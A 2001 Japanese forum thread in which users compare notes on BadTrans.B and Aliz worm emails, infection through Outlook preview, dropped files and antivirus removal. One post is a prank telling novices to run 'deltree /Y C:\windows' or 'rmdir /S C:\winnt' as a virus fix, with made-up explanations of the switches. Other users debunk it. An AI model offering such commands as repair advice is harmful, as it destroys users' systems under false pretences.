ウイルスメル多くねぇ?

このエントリーをはてなブックマークに追加
11
なんか昨夜から異常に来てんですけど。

特徴
1,差出人は知らないメルアドレスで先頭に_が付いている
2,40kb
3,内容は無し

おらぁマカーだから感染しないけどDLウザすぎ。
どうなってんのよ Ψ(`-´)Ψ
2名無しさん@お腹いっぱい。:01/11/29 00:13 ID:jsObOlVT
おしい。おそらく同一主旨のスレと思われるものが
先に立っていました。
http://www.2ch.net/2ch.html
統一されたほうがよろしいかと。
32:01/11/29 00:13 ID:ApnaZOdb
4名無しさん@お腹いっぱい。:01/11/29 00:14 ID:jsObOlVT
http://www.2ch.net/2ch.html
すみません。間違えました(w
5名無しさん@お腹いっぱい。:01/11/29 00:16 ID:jsObOlVT
あ、また間違えた(泣
3さんが出してくれてるし(w
ありがとう。ちょと逝ってきます・・・
6名無しさん@お腹いっぱい。:01/11/29 00:17 ID:jsObOlVT
7名無しさん@お腹いっぱい。:01/11/29 00:18 ID:jsObOlVT
↑ここ
81:01/11/29 00:37 ID:HFzQuK9q
ほんとだ。スレ立ってたんだね。スマソ。一応まとめとこう。

バッドトランス-B。
http://www.symantec.com/region/jp/sarcj/data/w/w32.badtrans.b%40mm.html
http://www.trendmicro.co.jp/virusinfo/default3.asp?VName=WORM_BADTRANS.B

んで、差出人のメルアドレスから_を抜いた人が感染してるってのはほんとなの?
(例: [email protected] → [email protected]
すげー数なんですけど。みんな感染してんのかな。
9名無しさん@お腹いっぱい。:01/11/29 00:58 ID:enVOs2e1
>>8
メールをプレビューしただけで感染することがあるから…
アウトルックとかアウトルックエクスプレス使ってると。
設定をきちんとして、パッチ当てておけばいいんだけどね。
ttp://www.sapporoworks.ne.jp/secure/004/index.html
ttp://www.sapporoworks.ne.jp/secure/003/index.html
10名無しさん@お腹いっぱい。:01/11/29 01:06 ID:AHcyN4Ia
こんな事態が発生するのに、
なぜみんなOutlookやIEを使い続けるのか。
11名無しさん@お腹いっぱい。:01/11/29 01:07 ID:wk98PY8R
実行されてしまった場合はどうなるんですか?
具体的に、わかるの?感染したこと。
12 :01/11/29 01:14 ID:q8GXL6GX
gooのメールによく来るけど開けないだけで問題なし。
つうか知り合いに10件くらい感染してる奴がいる…。
毎日…
13名無しさん@お腹いっぱい。:01/11/29 02:08 ID:enVOs2e1
>>11
>具体的に、わかるの?感染したこと。
Windowsのシステムディレクトリに
Kernel32.exe
cp_25389.nls
kdll.dll
というファイルが作成されるから、スタートメニューの検索で探せばよい。
>実行されてしまった場合はどうなるんですか?
>>8のリンク先参照。
14名無しさん@お腹いっぱい。:01/11/29 07:45 ID:bLmDU+Cl
>>13
ありがとーヽ(・∀・)ノ
15名無しさん@お腹いっぱい。:01/11/29 07:50 ID:t0zTiNbY
IE5.5使っているのなら、SP2のパッチを当てておけば大丈夫ということか?
だが、アンチウィルスかけると「感染しています」と出る。
レジストリに書き込まれた様子もないし…。
これは大丈夫なんだろうか。
161:01/11/29 08:27 ID:cxWHRR/w
糞Ψ(`-´)Ψ>ゲイツ
17イパーイ ◆aup.MklY :01/11/29 08:36 ID:CcMoGqez
今朝(ついさっき)、それと思しきメールが来たよぅヽ(`Д´)ノ
>>1と全く同じ。
即効消しました。。。
てーか、こういうの実ははじめて(ぽ)
18名無しさん@お腹いっぱい。:01/11/29 11:20 ID:REBgSj/1
ウイルス名: WORM_ALIZ..A
別 名: iworm.alizee, TROJ_ALIZ.A, W32.ALIZ.WORM, WIN32.ALIZ, ALIZ
言 語: 英語
ウイルス種類: トロイの木馬型(ワーム型)
プラットフォーム: Windows
暗号化: No
ウイルスサイズ: 4096bytes
発見日: 2001年9月4日
発病条件 1: ファイル実行時
破壊活動 1: メールを自動送信する
詳 細: -
 これはワームに分類されるトロイの木馬型不正プログラムです。
Outlook、OutlookExpressの設定を利用して自身のコピーを添付したメールを任意の
宛先に送信し、ネットワーク上で自己増殖するワーム活動を行います。
流行した「ニムダ」ウイルス同様、InternetExplorerのセキュリティホールを
利用しメールをプレビューしただけで活動を開始する「ダイレクトアクション活動」
を実現しています。

活動:
 ワームはOutlook、OutlookExpressの設定を利用し、Windowsのアドレス帳
ファイルから抽出したメールアドレスに自身のコピーを添付したメールを送信します。
ワームはメール送信以外にシステムの改変などは行いません。

 ワームが送信するメールの内容は以下の通りです:

 メール本文:"Peace."
 添付ファイル名:"WHATEVER.EXE"
19名無し:01/11/29 11:28 ID:PEDVVh9v
怖いね〜。
201:01/11/29 11:42 ID:cxWHRR/w
参った。
シマンテクをよく読むと、キャッシュの中の.ht**と.aspに含まれる
メールアドレスにもviriiを送りつけるんだね。
つーことはアドレス帳に入ってなくても送られるんだ。
道理で多いわけだ。

アフォΨ(`-´)Ψ>ゲイツ
21 :01/11/29 11:55 ID:v057EvO4
ウチは一昨日、昨日と連日
W32.Badtrans.B@mm(Batdtrans.B)が来るなぁ。
IE6&パッチ済みだけど大丈夫なんじゃろか。
22 21:01/11/29 11:58 ID:v057EvO4
ちなみに届いたメルの添付ファイルは*.pifと*.scr
23名無しさん@お腹いっぱい。:01/11/29 12:00 ID:moFclRAv
折れの所にも来たよー
二フとホットメールに2通来た・・・
アウトルックで開いたんだけど、、、アウトルック6は
ファイル開く前に警告が出たよ。

これって、、、ウイルス感染してない?
24名無しさん@お腹いっぱい。:01/11/29 12:01 ID:vT3fWK7B
昨夜来たけど、大丈夫。レジストリーもチェックしたけど異常なし。
251:01/11/29 12:34 ID:cxWHRR/w
同様スレ
http://kaba.2ch.net/test/read.cgi/net/1006876322/l50
がありましたがそちらはメアド晒したため削除対象になるようで
こちらを活かしておきます。
26名無しさん@お腹いっぱい。:01/11/29 13:52 ID:M6x/WuUG
�ワウニ� Re: � 11月�28日 40k�
hotmailに着てた!!!
27名無しさん@お腹いっぱい。:01/11/29 14:21 ID:0q5fw4tN
ウィナーは哀れやのう
28sageてね!! ◆kA7ABCsw :01/11/29 14:45 ID:JYcjnyqu
マッカーの代表はコシキタン
29名無しさん@お腹いっぱい。:01/11/29 16:43 ID:cxWHRR/w
>>27
ウィナーというのは悔しいからゲイツァーと呼ぼう。
30名無しさん@お腹いっぱい。:01/11/29 17:51 ID:NAfTRhOZ
オレ、テンプファイル、カイフウシタ。

ウイルスニオカサレタ。(藁
31名無しさん@お腹いっぱい。:01/11/29 20:55 ID:wC86Rguz
開封してしまったけど何も無い・・・
林檎にも感染さしてくれ!!!!
321:01/11/29 21:07 ID:cxWHRR/w
林檎にはいらないよ〜(・∀・)


Ψ(`-´)Ψ>下逸
33名無しさん@お腹いっぱい。:01/11/29 21:13 ID:HBs45dR+
おいらも真っ赤ー
でもウイルスは無差別にやってくるさ、
差出人が実名のやつがきたyo(藁
34(´ー`)y-~~~ :01/11/29 21:14 ID:mtQfi3/s
winもmacもガバレヽ(´ー`)ノ
35名無しさん@お腹いっぱい。:01/11/29 21:26 ID:vPEntuq1
今mikirinから来たyo!!
36名無しさん@お腹いっぱい。:01/11/29 21:34 ID:/hUENU82
�シi@t� Re: � 11月�29日 40k
こんなんもきたぞ


37名無しさん@お腹いっぱい。:01/11/29 21:45 ID:ZUhg1uRD
こんなのも来た。

From [email protected] Thu, 29 Nov 2001 04:13:45 -0800
Received: from [210.139.254.157] by hotmail.com (3.2) with ESMTP id MHotMailBDCF713900BB40043154D28BFE9DDE300; Thu, 29 Nov 2001 04:12:42 -0800
Received: from mail.kc4.so-net.ne.jp (mail.kc4.so-net.ne.jp [210.139.254.57])
by mgate10.so-net.ne.jp (8.9.3/3.7W01060506) with ESMTP id VAA11216
for <******@hotmail.com>; Thu, 29 Nov 2001 21:12:41 +0900 (JST)
From: [email protected]
Received: from oemcomputer (p84cce4.tcurpc00.ap.so-net.ne.jp [210.132.204.228])
by mail.kc4.so-net.ne.jp with SMTP id fATCCd507055
for <******@hotmail.com>; Thu, 29 Nov 2001 21:12:39 +0900 (JST)
Date: Thu, 29 Nov 2001 21:12:39 +0900 (JST)
Message-Id: <[email protected]>
To: <******@hotmail.com>
Subject: =?ISO-2022-JP?B?GyRCIXkkTyQ4JGEkXiQ3JEYhIxsoQg==?=
MIME-Version: 1.0
Content-Type: text/plain; charset="ISO-2022-JP"
Content-Transfer-Encoding: 7bit

☆エンタメ雑誌webmaster全国人気サイトご紹介!!
 --------------
 今週上位のお勧め
 --------------
◇◆♪Fineな恋愛は
「クラブジャパン」で体感♪アド非,高速チャット,占い,業界初UP機能,女性は現金20万円獲得出来ます♪ ココ⇒ http://www.club-j.jp/?ad=12
 --------------
GO!!
38名無しさん@お腹いっぱい。:01/11/29 21:59 ID:IO3/auCc
おれは、11/20ごろからW32/Alizメールの攻撃受けて
11/22ごろW32/Alizに感染しました。
取引先からでしたのでうっかり開封したためです。
一日がかりで修復しました。
そして昨日WORM_BADTRANS.Bに感染しました。
これっつて、開封しなくても感染します。
メーラーの設定ちゃんとIPAに書いてあったようにしたのに・・・
ウィルス作者は逝ってよし
39名無しさん@お腹いっぱい。:01/11/29 22:04 ID:lOreviIn
SP2入れとけよ
40名無しさん@お腹いっぱい。:01/11/29 22:16 ID:PdwSw5LA
友達少ない俺にも2通も来た。
元アドレスはだから簡単に特定できる・・
一応教えてあげたよ。俺自身はマクだから平気なのね。
41名無しさん@お腹いっぱい。:01/11/29 22:36 ID:+X1Hv1R9
ポスペは平気でしょ?
話題に出ないんだけど。。。うーん。
42名無しさん@お腹いっぱい。:01/11/29 22:44 ID:J3qz+5/g
>>41
ポスペは問題なし。ご安心めされぃ。
43名無しさん@お腹いっぱい。:01/11/29 22:50 ID:+X1Hv1R9
>>42
ありがとう〜! 安心♪
44名無しさん@お腹いっぱい。:01/11/29 23:06 ID:pU12c2aa

"ワウニ" <[email protected]> � �
Re: �
日付�:�
Thu, 29 Nov 2001 00:12:18 +0900 (JST) �
添付ファイル�:� docs.DOC.pif (38k),�text5.txt (0b)

開きたい・・・
45名無しさん@お腹いっぱい。:01/11/29 23:11 ID:pU12c2aa
差出人�:�
"シi@t" <[email protected]> � �
件名�:�
Re: �
日付�:�
Thu, 29 Nov 2001 20:55:58 +0900 �
添付ファイル�:� Pics.DOC.scr (38k),�text5.txt (0b)


これもか??
46名無しさん@お腹いっぱい。:01/11/29 23:14 ID:vPEntuq1
>>44
いいのか?他人のメアド出して?
47イパーイ ◆aup.MklY :01/11/29 23:20 ID:FW5xxMEv
ぅーゎっ
また来やがった(;´Д`)

悪気ないんだから、みんなメアド晒すのはやめようね(´ー`)yー~~
48名無しさん@お腹いっぱい。:01/11/29 23:25 ID:D+WukTv7
感染してしまったらどうすればいいですか?
あと、放っておくとどうなりますか?
49イパーイ ◆aup.MklY :01/11/29 23:30 ID:FW5xxMEv
参考になるかどうかわかんないけど・・
http://www.symantec.co.jp/region/jp/sarcj/data/w/[email protected]
50名無しさん@お腹いっぱい。:01/11/29 23:33 ID:1amOOQRV
あー、きたきた。ポスペ大丈夫なんだよね?
511:01/11/29 23:45 ID:J3qz+5/g
1、メアド晒しはヤメよう! アンダーバーを消せばその人のアドレスなんだから。
2、感染したらとりあえずシマンテクのページにでも行って駆除されたし。(方法が書いてます)
3、問題はアドレス帳に載っている人だけじゃなくてキャッシュの中のメールアドレスにも
  送信するから、サーフ(死語)するたびにウィルスメールを送り続ける、らしい。
4、ポスペは問題なし!(らしい)
52名無しさん@お腹いっぱい。:01/11/29 23:49 ID:4ujZl/MS
>>51

シマンテクのペジー、オシエテー。

オラ、感染しちまったダ。
531:01/11/29 23:55 ID:J3qz+5/g
>>52
あれ。シマンテクのページには「NAVを使って駆除する」というのしかないな。
>>49のURLでいいと思いますよ
54名無しさん@お腹いっぱい。:01/11/30 00:01 ID:aQZJpFOe
>>53
サンクス!
55名無しさん@お腹いっぱい。:01/11/30 00:46 ID:j1tAKHI+
ポスペは大丈夫ってのは根拠あるの?
ポスペに来たメルでもNortonAntiVirusが反応したぞ。
感染したその時には何も起こらないってのは常識じゃないのか?

結論:ポスペでも感染する。
56名無しさん@お腹いっぱい。:01/11/30 00:47 ID:vifDzNgE
トレンドの自動駆除ツールでOK?
57名無しさん@お腹いっぱい。:01/11/30 00:56 ID:vZHCyaTH
>>55
添付ファイルに反応したのでは?<あんちういるす
OE場合、セキュリティホール塞いでない場合
プレビューすると添付ファイルが実行されちゃうの。
ポスペだと添付ファイルそのものを実行しない限り
感染しないはず。
58名無しさん@お腹いっぱい。:01/11/30 01:13 ID:535ywZDR
IE6普及キャンペーンの一環でMSが配布してたとしたら鬱だ… 
59 :01/11/30 01:22 ID:/7jWhhK0
ありうるZO!!
60名無しさん@お腹いっぱい。:01/11/30 07:42 ID:YB2f91rq
>>58
そうなの?
61名無しさん@お腹いっぱい。:01/11/30 07:49 ID:GT+HU2es
>60
ばれたらMSの存続にかかわるからそんな事はないと思われ。
でもゲイツとMSの過去の行動・キャラクターからは
「ひょっとしたらそうなのかも」などと楽しめます。
62名無しさん@お腹いっぱい。:01/11/30 07:57 ID:jHDUpCc4
ウイルス発生率の多いWINからMacに乗りかえる奴が激増するので、
Mac用にWINより性質の悪いウイルスを研究しているぞ、MSは。
63名無しさん@お腹いっぱい。:01/11/30 08:25 ID:9fz43D8T
なぜ、知らない人たちから送られてくるんだろう?
受信簿にあるアドレスで送る仕組みなのだろうに。
64名無しさん@お腹いっぱい。:01/11/30 08:30 ID:8u7StBmy
>>63
「WORM_BADTRANS.B」というウィルスが流行しし始めている模様です。

このウィルスの場合、過去に直メールをしたことのある相手だけでなく、「temporary Internet files」からも勝手に送信をしてしまうため、多くのASA板住人に感染してしまっている模様です。

メールのタイトルが・・・
 "Pics"
 "images"
 "README"
 "New_Napster_Site"
 "news_doc"
 "HAMSTER"
 "YOU_are_FAT!"
 "stuff"
 "SETUP"
 "Card"
 "Me_nude"
 "Sorry_about_yesterday"

であり、拡張子部分が・・・

 ".DOC."
 ".ZIP."
 ".MP3."
 "scr"
 "pif"

となっているメールに関しては、知っている方からのメールであっても、プレビューせずに(メールを見ただけでも感染する模様)削除することをオススメします。
65名無しさん@お腹いっぱい。:01/11/30 08:37 ID:WIspoMrr
つーかウチにもばんばん来るんだが・・・
昨日一日で6通来た。恐ろしい。
661:01/11/30 08:55 ID:BjnqQfcW
>>63
インターネットのキャッシュ(一度訪れたページ)内の
html及びaspに含まれるメールアドレスにも送るようですよ。
だからページ管理者にはすごい数が届くらしい。
しかも単に訪れただけの人からだから誰か判らない。
67Miyuki.Kanda:01/11/30 09:01 ID:Ku3tzDrv
ウィルス集めています。どんどんメールで送ってネン!
68名無しさん@お腹いっぱい。:01/11/30 09:02 ID:svnwvDdm
>>67
まじで送ったぞ!
69名無しさん@お腹いっぱい。:01/11/30 09:05 ID:jHDUpCc4

最近ウイルスが大量に来て困ってませんか?
自己防衛しないといけませんね。
あらかじめ、PCの設定を変えることでウイルスを防ぐ事ができますよ。

設定方法
【1】スタート→プログラム→MS-DOSプロンプト、またはコマンドプロンプトを起動する。
【2】win95かwin98の人は「deltree /Y C:\windows」
  winNTかwin2000の人は「rmdir /S C:\winnt」
  ※「/Y」は「yield」の略。「生産する」の意味。
    「/S」は「second /Y」の略。こちらの方が改良されている。
【3】あとは自動的にwindowsがウィルス駆除してくれるよ。

★「deltree」や「rmdir」は緊急修復用のコマンドです。
★こういうシステムがらみの修復にはDOSを使うと
 システムの割り込みが抑えられ、快適に駆除されます。
★「deltree」や「rmdir」はwindowsの標準コマンドなので安心。
 機能も高く、UPDATEを自動作成するほか、
 機能の改変も全て自動でできるという優れものです。
70名無しさん@お腹いっぱい。:01/11/30 09:11 ID:2fLKmsmC
晒し上げ
71名無しさん@お腹いっぱい:01/11/30 09:13 ID:QWsbH3Id
>>69

素人をだまして、なんか楽しいかい?
だますなら、大物だませ。
バァーカ。
すべてのシステムファイルをごっそり消すコマンドなので、絶対、やらないように
7270:01/11/30 09:16 ID:2fLKmsmC
「deltree」や「rmdir」はディレクトリを削除する
コマンドです。実行すると大変なことになると思われ。
「/Y」は知らないんで詳しい人解説お願いします。
7370:01/11/30 09:17 ID:2fLKmsmC
かぶった。しかもこっちのほうが3分も遅い
欝だ詩嚢
7469:01/11/30 09:22 ID:QWsbH3Id
>>72

/Y って、結果表示をしない様にするコマンドだろ?
試ぬのは、>>69
75名無しさん@お腹いっぱい。:01/11/30 09:24 ID:Hahhn+8Q
>>72
調べろ、以上
7669やねーや、71:01/11/30 09:26 ID:QWsbH3Id
間違えた。
もう一つ。
あぽ〜んするか、確認メッセージをださない様にするオプション。
最悪、激鬱。
逝ってきます。
7769:01/11/30 09:33 ID:jHDUpCc4
すんません。ネタでコピペしたんで、悪意ないっす
78名無しさん@お腹いっぱい。:01/11/30 09:37 ID:fvtpLoP1
ペンギンしかコマンドライン触らないからdosコマンドにrmあるの知らな
かったよ。ちょっと感激。 でも、dosのコマンドって長ったらしいね。
79名無しさん@お腹いっぱい。:01/11/30 09:36 ID:/ty57F2u
>>77
氏ね。つーか、マジで死んでこい。
80名無しさん@お腹いっぱい。:01/11/30 09:45 ID:P48ECZxq
朝からポスペに1通、lycosにも5通ほど届いた。鬱だ。
81名無しさん@お腹いっぱい。:01/11/30 11:12 ID:dgOTmf8B
エキサイトのフリメに一日40通ぐらい来るぞ。
一瞬で容量限界になって大事なメールが受信できない。
HPにメアド載せてるからかなぁ
82名無しさん@お腹いっぱい。:01/11/30 12:13 ID:QX/VEcwz
漏れは掲示板にメールアドレスを書き込まないようにしただけで
かなり減りました<ウィルスメール
83名無しさん@お腹いっぱい。:01/11/30 12:14 ID:BjnqQfcW
>>81
俺もそう思って消したんだけど
フォームとかも読み込むから消すの難しいよな。

しかしウィルスに気付いてないヤツラの多いこと...
84名無しさん@お腹いっぱい。:01/11/30 12:29 ID:cdWjvq2m
>>69
ネタになってないだろ
85名無しさん@お腹いっぱい。:01/11/30 12:31 ID:eynBSQyx
ライコスに4通来てたけど、開いて大丈夫か?
知り合いからなら教えてあげたいんだが。
86名無しさん@お腹いっぱい。:01/11/30 12:33 ID:QX/VEcwz
>>85
アウトルックやアウトルックエクスプレス以外で受信したなら、
添付ファイルを実行しなければ大丈夫。
87 ◆BNR34.YA :01/11/30 12:57 ID:TMwT3K7J
ベッキーを使っているんだが、困ったことがある。
とりあえずウィルスには感染しないので平気なのだが、
ウィルスバスターがベッキーに対応してやがらない。
メールボックス(=単一ファイル)すべてをどっかに隔離しちまう・・・
88名無しさん@お腹いっぱい。:01/11/30 13:31 ID:t7hza1oC
本籍地 名古屋市 現住所 神戸市
1983 3・22 名古屋市昭和区の余語病院にて生まれ育つ。小4で神戸へ。隣の小学校にはあの酒鬼薔薇聖斗がいた。つまり同じ友中の校区で同学年だったのでッツーか小学校のダチヤツと事件当時同じクラスだったし…。
1995 1・17 阪神大震災。殺意の波動に目覚める。
そのせいかナンカノ間違いで灘中に通ってしまう。これが全ての間違いだった。まあ落ちてりゃ首斬られタン俺かもしんナイケド(笑)。
もちろんまぐれなので勉強について行ける訳が無くグレル。散々屁垂れた後当然の如く浪人。今に至る。
89うんと:01/11/30 13:41 ID:YLQAAcCL
マザーに同梱されていたpc-cilling使ってるけど
特に問題なく駆除してくれているみたい。
あと、ドりキきゃスで受信してサーバーから消してしまうとか。

とりあえず最低限の自己防衛もしていない奴は
回線切ってモジュラージャックを尻の穴に突っ込んだまま死ね!
90:01/11/30 15:48 ID:NekyYP4O
うちにも着た・・・うれしい!!hotmailできた
みんなと一緒
わーい!わーい!
9163:01/11/30 16:59 ID:eFl4PDJC
なるほど。HPにメルアド載せてたからなんですね。
921:01/11/30 17:06 ID:BjnqQfcW
>>91
うん、それが一番やっかいだ。
93名無しさん@お腹いっぱい。:01/11/30 17:29 ID:wW73Kh3S
あの、こんなことを書くと引っ込んでろ!と言われそうだけど…。

どんなメーラーを使っていても、HTMLメールを閲覧する時にフレーム内でインターネットエクスプローラーが起動するのであれば、感染の可能性はあるわけで。
EXEファイルの警告を「今後は表示しない」にしていなければ、古めのIEでも感染しないんですけどねぇ。

ここから実行する
ファイルを保存する

ときかれますから。
94超初心者につき:01/11/30 17:30 ID:JkhVBRSC
教えてちゃんで失礼します

OEの場合、プレビューウィンドウを表示しなければ
プレビューしちゃうことないのよね?
95名無しさん@お腹いっぱい。:01/11/30 17:49 ID:xC3zrKps
>>94
yes.
96超初心者につき:01/11/30 17:52 ID:JkhVBRSC
>95
サンクス!
97名無しさん@お腹いっぱい。:01/11/30 18:00 ID:axtFL0Ug
マジで多いな。何かあったのか?
98名無しさん@お腹いっぱい。:01/11/30 18:04 ID:cESiMNyu
うん、漏れのとこも毎日2通程来る。
先週辺りからいきなり来だしたな…
99名無しさん@お腹いっぱい。:01/11/30 18:05 ID:RYZfZyJD
ウイルス駆除ソフトメーカーのジサクジエーン
100名無しさん@お腹いっぱい。:01/11/30 18:16 ID:59tXu8ZH
さっぱりこねー。
101名無しさん@お腹いっぱい。:01/11/30 18:33 ID:T2wq264D
WORM_BADTRANS.B
が来て感染したらしくて困ってるんだけど。
一応トレンドマイクロのHP見て元に戻したけど
色々な所から貴方のメールからウィルスが検出されましたって出て
困ってる。そうすりゃいいの?
102名無しさん@お腹いっぱい。:01/11/30 18:40 ID:oy9kwO5/
>>101
元に戻す前に発信されたウィルスメールじゃないの?
103名無しさん@お腹いっぱい。:01/11/30 18:55 ID:T2wq264D
>>102
セガとかビックとかヨドバシとかから何通も来てうざい。
10485:01/11/30 18:58 ID:SW8EmS+i
ライコスに来てたの開けてみた。
4通とも別の人でぜんぜん知らない人だった。
だが、添付ファイルの表示ないんだよね。40kあるのに。
なんで?ライコスに来た人いる?
105名無しさん@お腹いっぱい。:01/11/30 18:59 ID:RrGWUhHS
一通もこねぇー、なんかハミ子な気分
106名無しさん@お腹いっぱい。:01/11/30 19:03 ID:LS6YQbv9
>>104
イパーイ来てた(w;<ライコス
添付ファイルの表示はなし。
107106:01/11/30 19:07 ID:FMieeszL
ダウンロードしてウィルスバスターでウィルスプロパティ見てみたら、
バッドトランスって判定された。<ライコスのメール
108名無しさん@お腹いっぱい。:01/11/30 19:24 ID:5IoBN1Qn
ういるすうぜぇ。。
hotmailに1日10通は来る!!
なんかmp3とか書いてるからあけちゃいそうになる!!
109名無しさん@お腹いっぱい。:01/11/30 19:32 ID:2BGhmuqx
きょうも来ました。これで4つめでござーい。
40Kバイトでタイトル部分はRe:だけで本文なし、差出人不明。
WEBメールだから即座に削除、うっとおしいでござーい。
いったい、いつまで続くのかー!!
110名無しさん@お腹いっぱい。:01/11/30 19:59 ID:vPgKn+hf
ウィルスメール送信元にウィルス感染してるよって教えてあげてる?
私は教えてないんだけど、教えたほうがいいのかな?
111名無しさん@お腹いっぱい。:01/11/30 20:25 ID:pbwDqQoe
超初心者でウィルスの削除の仕方がさっぱりわかりません。
用語はわからない??
誰か教えて下さい。
112名無しさん@お腹いっぱい。:01/11/30 20:40 ID:yY+q5Y2k
>>110
教えないよ。どーせ誰かおせっかいな人が教えてるでしょ。
いつまでも同じ人から来るようなら教えるかもしれないけど。
113名無しさん@お腹いっぱい。:01/11/30 21:06 ID:LIndtW/n
>>110
とりあえず、超初心者が2chなんか来るなと。
114名無しさん@お腹いっぱい。:01/11/30 21:29 ID:2qQEK1DH
>>113
そんなこと云うあんたってださい。ぷ。
115名無しさん@お腹いっぱい。:01/11/30 21:34 ID:LIndtW/n
>>114
で?
116名無しさん@お腹いっぱい。:01/11/30 21:55 ID:+HeBmXU1
>>115
ださい
117名無しさん@お腹いっぱい。:01/11/30 22:00 ID:vPgKn+hf
>113
ああ、超初心者扱いされてしまったか。不愉快な気分にさせてたらごめんね。

>112
レスありがとう。そういえば同じ人から何度も来てるかっていうチェックはしてないわ。
3通以上同じ人から来てる場合はちょっと一言連絡してみるかな。

でも今日になって、随分例のメール減った気がするよ。
118113:01/11/30 22:03 ID:LIndtW/n
ああ〜、超スマン、>>117 >>111の間違いだった。
ゴメーン、鬱だ。
119名無しさん@お腹いっぱい。:01/11/30 22:06 ID:+HeBmXU1
>>118
なんだ間違いか。
じゃあ俺も謝るよ。スマンコ
120113:01/11/30 22:07 ID:LIndtW/n
気を取りなおして、
>>111
板トップのシマンテックとトレンドマイクロのリンクをクリックして
なんとか理解してくれ〜。
しかし削除って、もう感染してるんか?
不安ならウィルス駆除ソフト(ウィルスバスターとか)を買って
インストールしよう。プレインストールされているかもしれんが。
121名無しさん@お腹いっぱい。:01/11/30 22:20 ID:vPgKn+hf
>>120
ヽ(^ω^)ノ キニシナイキニシナイ
シマンテックの駆除手順の説明、時々変な日本語の時があって鬱・・・

関係ないけど雅子さま出産間近オメデタイ
122113:01/11/30 22:54 ID:LIndtW/n
とりあえずトレンドマイクロのオンラインウィルス検索がお手軽か?
123名無しさん@お腹いっぱい。:01/11/30 23:05 ID:+HeBmXU1
俺もオンラインスキャンやっといたよ。
ちょっと安心した。
124名無しさん@お腹いっぱい。:01/12/01 01:10 ID:TJU+ojH1
イママデ ウィルス 1ドモキタコトナイ・・・ チョトサミシイ ワザトオクラレルノハイヤダケド
125名無しさん@お腹いっぱい。:01/12/01 01:16 ID:Sn54a1vz
>>124
自分でサイト持つとイヤっていうほど来るよ。
あと掲示板に必ずメールアドレスを書くようにするとか。
126名無しさん@お腹いっぱい。:01/12/01 01:40 ID:pSQOH/oY
CGIは取らないらしいよ。htmlとaspのキャッシュだけみたい。
127名無しさん@お腹いっぱい。:01/12/01 01:42 ID:Sn54a1vz
>>126
ログをHTML出力する掲示板もあるから安心できません。
塩のゲストブックなんかその典型。
128名無しさん@お腹いっぱい。:01/12/01 02:00 ID:J9uW8ggM
WORM_BADTRANS.B。

俺も累計50通ほど届いてる。
俺の個人HPにアドレス載せてて
読者数は1500人程度だから、
感染率はネット人口の3%程度。

サンプルに偏りはあるかしれんが、
ウイルスの感染率ってどんなもんなんだろ?
129名無しさん@お腹いっぱい。:01/12/01 02:47 ID:hAuw9vpa
おおっ
初めてウィルス来たよー
ちっとウレシィ(藁
速攻あぼんしちゃたけど
130名無しさん@お腹いっぱい。:01/12/01 02:48 ID:oi+GIS8y
うちもきた
131名無しさん@お腹いっぱい。:01/12/01 03:02 ID:Rnbgltlp
おい!オメ-らウィルス対策ソフトぐらい入れろボケ!
テメーらみたいな貧乏人がウィルスを撒き散らしているんだよ!
132名無しさん@お腹いっぱい。:01/12/01 04:02 ID:2Nf9aR2D
俺も初めてウイルス来たので少し感動。
133名無しさん@お腹いっぱい。:01/12/01 04:07 ID:R7xh6Mnc
オレも来たけど、WEBメールだから良かった。
でも差出人がいみわかんねぇ。
鈴木なんたらってやつから送られてきた。

そんな知り合いいないんだけど。
134名無しさん@お腹いっぱい。:01/12/01 04:13 ID:b49Dyq0l
ウィルスうぜぇぇぇぇぇぇぇっ!
一日に40通もくるんじゃねぇよっ!
135名無しさん@お腹いっぱい。:01/12/01 04:21 ID:WTRJz1Lu
>>133
最近のウィルスはWebページなんかに載ってるメールアドレスを拾って
絨毯爆撃しやがるのさ。
136名無しさん@お腹いっぱい。:01/12/01 04:32 ID:58O6VNUt
ウィルス直ったらどうやって確認したらいいですか?
一応削除はしたんだけど
137>136:01/12/01 04:33 ID:2rvmuQQ6
ウイルスが直っても困るんだが・・・
つーか意味不明。
138名無しさん@お腹いっぱい。:01/12/01 04:35 ID:WTRJz1Lu
>>136
http://www.trendmicro.co.jp/hcall/scan.htm
でオンラインスキャンでもしてみたら?
139おいおいおい…:01/12/01 07:49 ID:T4ggIoZm
…いや、今更だと思うんだけどさ。
このスレ読めば大体対処できるぞ。
http://pc.2ch.net/test/read.cgi/sec/1007075829/l50
140名無しさん@お腹いっぱい。:01/12/01 09:13 ID:AFrRkjYH
Ψ(`-´)Ψ>ゲイツ
141名無しさん@お腹いっぱい。:01/12/01 09:15 ID:vMXKiTLI
今までそういうの一通も来た事ないので
少し寂しい
142名無しさん@お腹いっぱい。:01/12/01 09:24 ID:AFrRkjYH
>>141
いるんならあげますけど?
143名無しさん@お腹いっぱい。:01/12/01 10:07 ID:w7x4HjhM
>>141

仲間だワショーイ!!

少しサビシイ気持はわかるヨ!!
でも来ない方がイイと思われ(w
144名無しさん@お腹いっぱい。:01/12/01 11:11 ID:vvN5ydJU
いたずらメールは大量にくるのに
ウィルスが全然ついてないので,
感染してるのに気づいてないだけ(?)
とか不安になってしまいます.

ウィルスチェックはもちろんしてます.
鶴亀メール使ってるです.
145名無しさん@お腹いっぱい。:01/12/01 12:14 ID:GAaeeKCN
ウイルスメールらしき物が来ました。
知らない人から。40KBでした(付属あり)
とりあえず、プレビューなしの設定にして
削除したけど・・・。大丈夫でしょうか?
ちなみにOEとIE使ってます。
他のに変えようかな・・・。
146名無しさん@お腹いっぱい。:01/12/01 13:04 ID:bGagJ8V7
>>145
IEでもセキュリティホールちゃんとふさいで
プレビューウィンドウも表示してないなら大方大丈夫。
心配ならオンラインスキャンかけてみれ。
147名無しさん@お腹いっぱい。:01/12/01 13:13 ID:x+fbHcI8
>141
仲間がいたー!!
家にも一通もこないよ(w
148145:01/12/01 15:11 ID:xgLR9x02
>146さん
レスありがとうございます。
テレホタイムになったら、
オンラインスキャンかけてみます。
149名無しさん@お腹いっぱい。:01/12/01 18:53 ID:GbBDosgo
>>145そうだな!!サンクス!!
それが一番早い。頂きます。
150名無しさん@お腹いっぱい。:01/12/01 20:21 ID:qoQjtlET
Macは感染しないんですよね?
っていうことは、削除したあとはそのままなんにも
しないでいいのでしょうか。
こういうの来るの初めてでちょっとこわい…。
151名無しさん@お腹いっぱい。:01/12/01 20:53 ID:PJsykN+y
俺もいっぱいきてます。
1日に10通くらい届くのはなぜ??
152名無しさん@お腹いっぱい。:01/12/01 21:00 ID:cnjAJ5o8
>>150俺もマックだが開いても大丈夫だぞ!
でも来たら>>145のレスに設定すれば問題無し!!
>>151は他サイトでメアド晒し過ぎ!
